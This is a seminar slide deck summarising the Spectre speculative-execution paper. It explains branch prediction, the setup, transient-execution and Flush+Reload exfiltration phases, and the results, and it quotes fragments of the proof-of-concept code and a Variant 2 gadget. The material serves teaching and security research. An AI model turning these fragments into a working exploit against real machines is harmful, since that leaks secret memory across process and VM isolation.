# Spectre Attacks: Exploiting Speculative Execution David Bimmler May 2, 2019 Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, and Yuval Yarom. "Spectre Attacks: Exploiting Speculative Execution". In: 40th IEEE Symposium on Security and Privacy (S&P'19). 2019 #### Agenda **Executive Summary** Background Novelty Key Approach and Ideas Mechanisms (in some detail) Key Results: Methodology and Evaluation Summary Strengths Weaknesses Thoughts and Ideas Discussion Spectre is a security vulnerability violating memory isolation - Spectre is a security vulnerability violating memory isolation - It abuses speculative execution to execute instructions which should never be executed - Spectre is a security vulnerability violating memory isolation - It abuses speculative execution to execute instructions which should never be executed - It uses side-channels to leak microarchitectural state changed by erroneously executed instructions # Background # Background: Architecture vs Microarchitecture The *instruction set architecture* (ISA) is the contract between hardware and software. A microarchitecture (µarch) is an implementation of an ISA in a given processor. # Background: Direct and Indirect Branches | direct branch | indirect branch | |---------------|-----------------| | JMP 0x89AB | CALL EAX | | JNE Ox90AB | JMP EAX | | many more | RET | # **Background: Branch Prediction** Superscalar processors predict branch outcomes # Background: Branch Prediction - · Superscalar processors predict branch outcomes - Direction of direct branches (taken/not taken) - cached by Pattern History Table (PHT)/Branch History Buffer (BHB) # Background: Branch Prediction - · Superscalar processors predict branch outcomes - Direction of direct branches (taken/not taken) - cached by Pattern History Table (PHT)/Branch History Buffer (BHB) - · Target address of indirect branches - · cached by the Branch Target Buffer (BTB) - Return Stack Buffer (RSB) for CALL/RET pairs # Background: Speculative Execution - Predicted path is executed speculatively - Processor keeps track of what is being executed speculatively - · Prediction incorrect: discard effects # Background: Speculative Execution - Predicted path is executed speculatively - Processor keeps track of what is being executed speculatively - · Prediction incorrect: discard effects - Instructions executed due to misprediction called transient instructions · μarch is stateful (e.g. PHT, BTB, RSB, caches, ...) - µarch is stateful (e.g. PHT, BTB, RSB, caches, ...) - State shared between processes - µarch is stateful (e.g. PHT, BTB, RSB, caches, ...) - · State shared between processes - · Information leaks called side-channels - μarch is stateful (e.g. PHT, BTB, RSB, caches, ...) - · State shared between processes - · Information leaks called side-channels - Example: Flush+Reload<sup>1</sup> a cache side-channel <sup>&</sup>lt;sup>1</sup>Yarom and Falkner, "FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack" #### Flush+Reload: Attack Flush+Reload can monitor access of memory lines in shared pages #### Flush+Reload: Attack - Flush+Reload can monitor access of memory lines in shared pages - · Access to monitored memory is fast if victim has accessed # Novelty #### Novelty #### Spectre Attack Trick victim into speculatively performing operations which would not occur during correct program execution #### Novelty #### Spectre Attack - Trick victim into speculatively performing operations which would not occur during correct program execution - Leak sensitive information through microarchitectural side channel Key Approach and Ideas #### **Vulnerable Conditional Branches** The following code constitutes a Spectre gadget, vulnerable when **unsigned int** x is attacker controlled ``` if (x < array1_size) y = array2[array1[x] * 512];</pre> ``` # **Exploiting Conditional Branches** How is it vulnerable? ``` if (x < array1_size) y = array2[array1[x] * 512];</pre> ``` Speculative execution if array1\_size is not available #### **Exploiting Conditional Branches** How is it vulnerable? ``` if (x < array1_size) y = array2[array1[x] * 512];</pre> ``` Speculative out of bounds read for a malicious ${\bf x}$ #### **Exploiting Conditional Branches** How is it vulnerable? ``` if (x < array1_size) y = array2[array1[x] * 512];</pre> ``` Encode value in µarch state using cache side-channel #### **Exploiting Conditional Branches** Mechanisms (in some detail) #### Conditional Branch Example ``` unsigned int array1_size = 16; uint8_t array1[16] = {1, 2, ..., 15, 16}; uint8 t array2[256 * 512]; char *secret = "Squeamish Ossifrage"; 5 void victim_function(size_t x) { if (x < array1 size) {</pre> y = array2[array1[x] * 512]; } 10 ``` #### Generic Spectre Attack A generic Spectre attack consists of three phases - 1. Setup - 2. Transient Execution - 3. Data Exfiltration #### Spectre Attack: Setup Phase #### Prepare exfiltration side-channel ``` /* Flush array2[(0..255)*512] from cache */ for (i = 0; i < 256; i++) _mm_clflush(&array2[i * 512]);</pre> ``` #### Spectre Attack: Setup Phase Induce speculative execution by flushing array1\_size ``` for (j = 5; j >= 0; j--) { _mm_clflush(&array1_size); victim_function(training_x); } ``` #### Spectre Attack: Setup Phase Train branch prediction to take branch using valid values for x ``` for (j = 5; j >= 0; j--) { _mm_clflush(&array1_size); victim_function(training_x); } ``` #### Spectre Attack A generic Spectre attack consists of three phases - 1. Setup - 2. Transient Execution - 3. Data Exfiltration #### Spectre Attack: Transient Execution Phase Execute gadget with malicious $\mathbf{x}$ results in a speculative out of bounds read ``` _mm_clflush(&array1_size); victim_function(malicious_x); ``` #### Spectre Attack: Encoding Information Result of malicious read encoded in probe array ``` if (x < array1_size}) y = array2[array1[x] * 512];</pre> ``` #### Spectre Attack A generic Spectre attack consists of three phases - 1. Setup - 2. Transient Execution - 3. Data Exfiltration #### Spectre Exfiltration: Flush+Reload #### Exfiltrate using Flush+Reload ``` for (i = 0; i < 256; i++) { addr = &array2[i * 512]; time1 = __rdtscp(&junk); junk = *addr; time2 = __rdtscp(&junk) - time1; // compute access time if (time2 <= CACHE_HIT_THRESHOLD) printf("found: %#x\n", i); }</pre> ``` · Destination address of indirect branch may be unknown - · Destination address of indirect branch may be unknown - Speculative execution at predicted target address - · Destination address of indirect branch may be unknown - Speculative execution at predicted target address - Attack: mistrain branch target buffer in attacker controlled context - · Destination address of indirect branch may be unknown - Speculative execution at predicted target address - Attack: mistrain branch target buffer in attacker controlled context - Speculatively execute Spectre gadget for observable side effects #### Mistraining Branch Predictors · Attacker mimics pattern of branches in its own context #### Mistraining Branch Predictors - · Attacker mimics pattern of branches in its own context - Attacker-chosen target predicted in victim #### Mistraining Branch Predictors - Attacker mimics pattern of branches in its own context - Attacker-chosen target predicted in victim - Highly μarch-specific reverse-engineering necessary # Key Results: Methodology and Evaluation #### Methodology #### The paper presents multiple exploits: - 1. Variant 1 proof of concept in native code - 2. Variant 1 attacks in JavaScript and eBPF - 3. Variant 2 proof of concept in native code - 4. Variant 2 attack to leak host memory from within a KVM VM Spectre works - · Spectre works - · Quite a few µarchs tested - · Spectre works - · Quite a few µarchs tested - Intel Ivy Bridge, Broadwell, Haswell, Sky Lake, Kaby Lake, AMD Ryzen, ... - · Spectre works - · Quite a few µarchs tested - Intel Ivy Bridge, Broadwell, Haswell, Sky Lake, Kaby Lake, AMD Ryzen, ... - Bandwidth - · Spectre works - · Quite a few µarchs tested - Intel Ivy Bridge, Broadwell, Haswell, Sky Lake, Kaby Lake, AMD Ryzen, ... - Bandwidth - Error rate | | Bandwidth | Error rate | |-------------------|------------------|------------| | native PoC var. 1 | ~10 kB/s | < 0.01% | | JavaScript var. 1 | _ | _ | | eBPF var. 1 | 2 kB/s to 5 kB/s | _ | | native PoC var. 2 | 0.041 kB/s | _ | | KVM var. 2 | ~1.8 kB/s | 1.7% | · Transient instructions can violate security - Transient instructions can violate security - $\cdot$ in correct programs - Transient instructions can violate security - in correct programs - Through microarchitectural side-channels we can observe the effects - Transient instructions can violate security - in correct programs - Through microarchitectural side-channels we can observe the effects - Multiple variants to cause misprediction ## Strengths ### Strengths Gigantic impact ### Strengths - Gigantic impact - Complete mitigation in software seemingly impossible<sup>2</sup> <sup>&</sup>lt;sup>2</sup>McIlroy, Sevcík, Tebbi, Titzer, and Verwaest, "Spectre is here to stay: An analysis of side-channels and speculative execution" ### Strengths - · Gigantic impact - · Complete mitigation in software seemingly impossible<sup>2</sup> - Generality of attack <sup>&</sup>lt;sup>2</sup>McIlroy, Sevcík, Tebbi, Titzer, and Verwaest, "Spectre is here to stay: An analysis of side-channels and speculative execution" ### Strengths - · Gigantic impact - · Complete mitigation in software seemingly impossible<sup>2</sup> - Generality of attack - · Many papers discussing the attack <sup>&</sup>lt;sup>2</sup>McIlroy, Sevcík, Tebbi, Titzer, and Verwaest, "Spectre is here to stay: An analysis of side-channels and speculative execution" · µarch attack: finnicky, brittle - · µarch attack: finnicky, brittle - · Local execution required - · µarch attack: finnicky, brittle - Local execution required - But: NetSpectre<sup>3</sup> <sup>&</sup>lt;sup>3</sup>Schwarz, Schwarzl, Lipp, and Gruss, "NetSpectre: Read Arbitrary Memory over Network" - · µarch attack: finnicky, brittle - Local execution required - But: NetSpectre<sup>3</sup> - · Spotty evaluation <sup>&</sup>lt;sup>3</sup>Schwarz, Schwarzl, Lipp, and Gruss, "NetSpectre: Read Arbitrary Memory over Network" - · µarch attack: finnicky, brittle - Local execution required - But: NetSpectre<sup>3</sup> - Spotty evaluation - · Generality of attack not explained well enough <sup>&</sup>lt;sup>3</sup>Schwarz, Schwarzl, Lipp, and Gruss, "NetSpectre: Read Arbitrary Memory over Network" Thoughts and Ideas ## Performance versus Security · Fundamental tradeoff: performance versus security ## Performance versus Security - Fundamental tradeoff: performance versus security - · Mitigations are stop gaps: ISA might have to change ## Discussion ## **Discussion: Spectre Variations** ``` if (x < array1_size) { y = array1[x]; // do something using y that is observable // when speculatively executed }</pre> ``` Can you think of more observable effects? Thank You ## Bibliography i #### References via Speculative Execution". In: CoRR abs/1802.09085 (2018). arXiv: 1802.09085. URL: http://arxiv.org/abs/1802.09085. ## Bibliography ii Ge, Qian et al. "Time Protection: The Missing OS Abstraction". In: Proceedings of the Fourteenth EuroSys Conference 2019. EuroSys '19. Dresden, Germany: ACM, 2019, 1:1–1:17. ISBN: 978-1-4503-6281-8. DOI: 10.1145/3302424.3303976. URL: http://doi.acm.org/10.1145/3302424.3303976. Kiriansky, V. et al. "DAWG: A Defense Against Cache Timing Attacks in Speculative Execution Processors". In: 2018 51st Annual IEEE/ACM International Symposium on Microarchitecture (MICRO). Oct. 2018, pp. 974–987. DOI: 10.1109/MICRO.2018.00083. ## Bibliography iii - Kocher, Paul et al. "Spectre Attacks: Exploiting Speculative Execution". In: 40th IEEE Symposium on Security and Privacy (S&P'19). 2019. - Lipp, Moritz et al. "Meltdown: Reading Kernel Memory from User Space". In: 27th USENIX Security Symposium (USENIX Security 18). 2018. - McIlroy, Ross et al. "Spectre is here to stay: An analysis of side-channels and speculative execution". In: CoRR abs/1902.05178 (2019). arXiv: 1902.05178. URL: http://arxiv.org/abs/1902.05178. ## Bibliography iv Schwarz, Michael et al. "NetSpectre: Read Arbitrary Memory over Network". In: CoRR abs/1807.10535 (2018). arXiv: 1807.10535. URL: http://arxiv.org/abs/1807.10535. Yarom, Yuval and Katrina Falkner. "FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack". In: 23rd USENIX Security Symposium (USENIX Security 14). San Diego, CA: USENIX Association, 2014, pp. 719–732. ISBN: 978-1-931971-15-7. URL: https://www.usenix.org/conference/usenixsecurity14/technical-sessions/presentation/yarom. Backup ## Background: Virtual Memory - memory isolation between different processes - · typically provided by hardware via MMU - page tables translate virtual to physical addresses ## Disambiguation: Meltdown #### Meltdown<sup>4</sup> is not Spectre - also violates memory isolation - exploits out of order execution - privilege escalation reads kernel memory - race condition specific to Intel processors - mitigated by the KAISER patches <sup>&</sup>lt;sup>4</sup>Lipp, Schwarz, Gruss, Prescher, Haas, Fogh, Horn, Mangard, Kocher, Genkin, Yarom, and Hamburg, "Meltdown: Reading Kernel Memory from User Space". ### Background: Out-of-Order Execution - performance optimisation for pipelined processors - · instructions executed out of order - but retired (i.e. become visible) in order - complex data dependency logic in hardware ### Flush+Reload: Background - · Identical memory pages are shared between processes - $\boldsymbol{\cdot}$ e.g. for shared libraries ### Flush+Reload: Background - Identical memory pages are shared between processes - e.g. for shared libraries - Shared pages imply identical physical addresses ### Flush+Reload: Background - · Identical memory pages are shared between processes - · e.g. for shared libraries - Shared pages imply identical physical addresses - · L3 cache is physically tagged ## Variant 2: Spectre Gadget Attacker-controlled ebx and edi allows reading memory ``` adc edi,dword ptr [ebx+edx+13BE13BDh] adc dl,byte ptr [edi] Set edi to address of probe array (e.g. in shared library) Set ebx to m - 0x13BE13BD - edx ```